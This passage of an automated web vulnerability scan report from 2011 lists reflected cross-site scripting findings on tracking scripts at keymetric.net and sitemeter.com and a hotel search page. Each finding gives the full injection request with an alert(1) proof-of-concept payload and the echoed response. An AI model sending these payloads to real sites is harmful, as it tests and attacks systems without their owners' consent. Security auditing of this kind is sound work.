Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:02 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
val = 'unk'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = '95c71';alert(1)//e91e1825f03'; break;
case 'kmc1':
val = '95c71';alert(1)//e91e1825f03'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
...[SNIP]...
4.72. http://km5002.keymetric.net/KM2.js [lc2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6e50'%3balert(1)//0a22ede9ff4 was submitted in the lc2 parameter. This input was echoed as f6e50';alert(1)//0a22ede9ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=f6e50'%3balert(1)//0a22ede9ff4&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:05 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
val = 'f6e50';alert(1)//0a22ede9ff4'; break;
case 'kmc2':
val = 'f6e50';alert(1)//0a22ede9ff4'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
...[SNIP]...
4.73. http://km5002.keymetric.net/KM2.js [lc3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd63f'%3balert(1)//1018bb0840 was submitted in the lc3 parameter. This input was echoed as bd63f';alert(1)//1018bb0840 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=bd63f'%3balert(1)//1018bb0840&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:07 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5119

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'bd63f';alert(1)//1018bb0840'; break;
case 'kmc3':
val = 'bd63f';alert(1)//1018bb0840'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':

...[SNIP]...
4.74. http://km5002.keymetric.net/KM2.js [lc4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc4 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2faf9'%3balert(1)//19411599e76 was submitted in the lc4 parameter. This input was echoed as 2faf9';alert(1)//19411599e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=2faf9'%3balert(1)//19411599e76&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:10 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = '2faf9';alert(1)//19411599e76'; break;
case 'kmc4':
val = '2faf9';alert(1)//19411599e76'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
...[SNIP]...
4.75. http://km5002.keymetric.net/KM2.js [lc5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc5 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1597d'%3balert(1)//c54634f485d was submitted in the lc5 parameter. This input was echoed as 1597d';alert(1)//c54634f485d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=1597d'%3balert(1)//c54634f485d&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:12 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc3':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = '1597d';alert(1)//c54634f485d'; break;
case 'kmc5':
val = '1597d';alert(1)//c54634f485d'; break;
case 'kmrd':
val = 'Referrer information not available'; break;
case 'newvisit':
val
...[SNIP]...
4.76. http://km5002.keymetric.net/KM2.js [lca parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lca request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ab50'%3balert(1)//be7602a9b99 was submitted in the lca parameter. This input was echoed as 3ab50';alert(1)//be7602a9b99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=3ab50'%3balert(1)//be7602a9b99&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:57 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5092

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case 'kmas':
val = '0'; break;
case 'cpca':
val = '3ab50';alert(1)//be7602a9b99'; break;
case 'kmca':
val = '3ab50';alert(1)//be7602a9b99'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not pro
...[SNIP]...
4.77. http://km5002.keymetric.net/KM2.js [lkw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0ff1'%3balert(1)//57054945980 was submitted in the lkw parameter. This input was echoed as c0ff1';alert(1)//57054945980 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=c0ff1'%3balert(1)//57054945980&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:47 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5095

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= 'Campaign not provided'; break;
case 'cpag':
val = 'AdGroup not provided'; break;
case 'kmag':
val = 'AdGroup not provided'; break;
case 'kw':
val = 'c0ff1';alert(1)//57054945980'; break;
case 'kmkw':
val = 'c0ff1';alert(1)//57054945980'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
...[SNIP]...
4.78. http://km5002.keymetric.net/KM2.js [lmt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lmt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b760b'%3balert(1)//ea883eb4780 was submitted in the lmt parameter. This input was echoed as b760b';alert(1)//ea883eb4780 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=b760b'%3balert(1)//ea883eb4780&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:50 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5146

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'AdGroup not provided'; break;
case 'kw':
val = 'Keyword not provided'; break;
case 'kmkw':
val = 'Keyword not provided'; break;
case 'kmmt':
val = 'b760b';alert(1)//ea883eb4780'; break;
case 'kmmt':
val = 'b760b';alert(1)//ea883eb4780'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query no
...[SNIP]...
4.79. http://km5002.keymetric.net/KM2.js [rho parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rho request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a47b'%3balert(1)//aed1a99c366 was submitted in the rho parameter. This input was echoed as 2a47b';alert(1)//aed1a99c366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=2a47b'%3balert(1)//aed1a99c366&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:52 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5059

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
l = 'N/A'; break;
case 'kmc4':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmc5':
val = 'N/A'; break;
case 'kmrd':
val = '2a47b';alert(1)//aed1a99c366'; break;
case 'newvisit':
val = 'true'; break;
default:
val = 'undefined';
}
return val;
}
var km_Acct = '5002';
var cbd = km_GBD(window.location.hostname);
cbd
...[SNIP]...
4.80. http://km5002.keymetric.net/KM2.js [rqu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the rqu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3bd3'%3balert(1)//d1495a5981e was submitted in the rqu parameter. This input was echoed as d3bd3';alert(1)//d1495a5981e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=d3bd3'%3balert(1)//d1495a5981e&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:55 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5086

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...

case 'kmkw':
val = 'Keyword not provided'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmmt':
val = 'unk'; break;
case 'kmrq':
val = 'd3bd3';alert(1)//d1495a5981e'; break;
case 'kmrq':
val = 'd3bd3';alert(1)//d1495a5981e'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc1':
val = 'N/A'; break;
case 'kmc2':
...[SNIP]...
4.81. http://km5002.keymetric.net/KM2.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f117'%3balert(1)//8ecc17aa05a was submitted in the vid parameter. This input was echoed as 8f117';alert(1)//8ecc17aa05a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=8f117'%3balert(1)//8ecc17aa05a&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:43 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5063

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
= km_GBD(window.location.hostname);
cbd = ((cbd=='localhost')?'':cbd);
kmSessionDur = 30;
kmSes = new Date();
kmSes.setTime(kmSes.getTime() + 1000 * 60 * kmSessionDur);
document.cookie = 'kmS5002=8f117';alert(1)//8ecc17aa05a;expires=' + kmSes.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cooki
...[SNIP]...
4.82. http://s31.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s31.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc5a5'%3balert(1)//e81c2d1b33e was submitted in the site parameter. This input was echoed as bc5a5';alert(1)//e81c2d1b33e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s31gamersdailynewsbc5a5'%3balert(1)//e81c2d1b33e HTTP/1.1
Host: s31.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 13:30:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7334
Content-Type: application/x-javascript
Expires: Fri, 24 Jun 2011 13:40:46 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
ntListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s31gamersdailynewsbc5a5';alert(1)//e81c2d1b33e', 's31.sitemeter.com', '');

var g_sLastCodeName = 's31gamersdailynewsbc5a5';alert(1)//e81c2d1b33e';
// ]]>
...[SNIP]...
4.83. http://search.asiawebdirect.com/ [checkHotel%5BDestinationID%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.asiawebdirect.com
Path:   /

Issue detail

The value of the checkHotel%5BDestinationID%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66605"><script>alert(1)</script>865efa0e996ad9f5c was submitted in the checkHotel%5BDestinationID%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?checkHotel%5BboxName%5D=phuket.com+small+box&checkHotel%5BAll%5D=1&pDestinationID=75&DestinationID=&checkHotel%5BLanguageCode%5D=en&checkHotel%5BPortal%5D=phuket.com&checkHotel%5BRsvnv%5D=2.0&checkHotel%5BDestinationID%5D=7566605"><script>alert(1)</script>865efa0e996ad9f5c&txtCheck_InShort=24%2F06%2F2011&txtCheck_OutShort=25%2F06%2F2011&checkHotel%5BsDay%5D=24&checkHotel%5BsMonth%5D=06&checkHotel%5BsYear%5D=2011&checkHotel%5BsMonth2%5D=06%2F2011&checkHotel%5BeDay%5D=25&checkHotel%5BeMonth%5D=06&checkHotel%5BeYear%5D=2011&checkHotel%5BeMonth2%5D=06%2F2011&checkHotel%5BNights%5D=1&checkHotel%5BTotalAdults%5D=2&checkHotel%5BTotalChildren%5D=0&checkHotel%5BTotalRooms%5D=1&Submit=search HTTP/1.1
Host: search.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
Cache-Control: max-age=0
Origin: http://www.phuket.com
